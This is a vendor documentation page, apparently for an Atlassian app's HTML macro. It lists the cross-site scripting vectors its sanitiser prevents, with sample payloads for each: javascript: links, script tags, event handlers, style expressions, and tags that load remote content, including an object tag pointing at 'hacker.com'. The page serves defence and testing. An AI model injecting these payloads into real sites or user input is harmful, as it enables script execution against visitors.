List of security vulnerabilities prevented

  • Usage of <a> tag with the 'ahref' attribute:
<a href='javascript:alert("Test");'>Test 1</a>
<a href='javascript:alert("Test Vulnerability through a href unicode");'>Test 2</a>
(or)
[javascript:alert('Test Vulnerability through a href');]
  • Usage of JavaScript:
<script>alert('Test Vulnerability through script');</script>
  • Usage of script with include:
<script type="text/javascript" src="https://<somesite>/include.js"></script>
  • Usage if iframe with include:
<iframe src="https://bobswift.atlassian.com"></iframe>
  • Usage of 'onXxx' events irrespective of the tags:
<div style="padding: 20px; opacity: 0;height: 20px;" onmouseout="alert('Test Vulnerbility through onXxx events')"></div>
<img src="smiley.gif" alt="Smiley face" height="42" width="42" onerror="alert('No file found')">
  • Usage of script in the src attribute:
<img src="javascript:alert("XSS");">
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
<input type="image" src="javascript:alert('XSS');">
  • Usage of script in the background attribute:
<body background="javascript:alert("XSS")">
<table background="javascript:alert('XSS')">
<td background="javascript:alert('XSS')">
  • Usage of link tag with href:
<link rel="stylesheet" href="javascript:alert('XSS');">
  • Usage of script in the style attribute:
<div style="background-image: url(javascript:alert('XSS'))">
<div style="width: expression(alert('XSS'));">
  • Usage of object with include:
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">








Find answers from the community.

Ask a question to the community.

Log a request with our support team.

Confluence®, Jira®, Atlassian Bamboo®, Bitbucket®, Fisheye®, and Atlassian Crucible® are registered trademarks of Atlassian®
Copyright © 2005 - 2024 Appfire | All rights reserved. Appfire™, the 'Apps for makers™' slogan and Bob Swift Atlassian Apps™ are all trademarks of Appfire Technologies, LLC.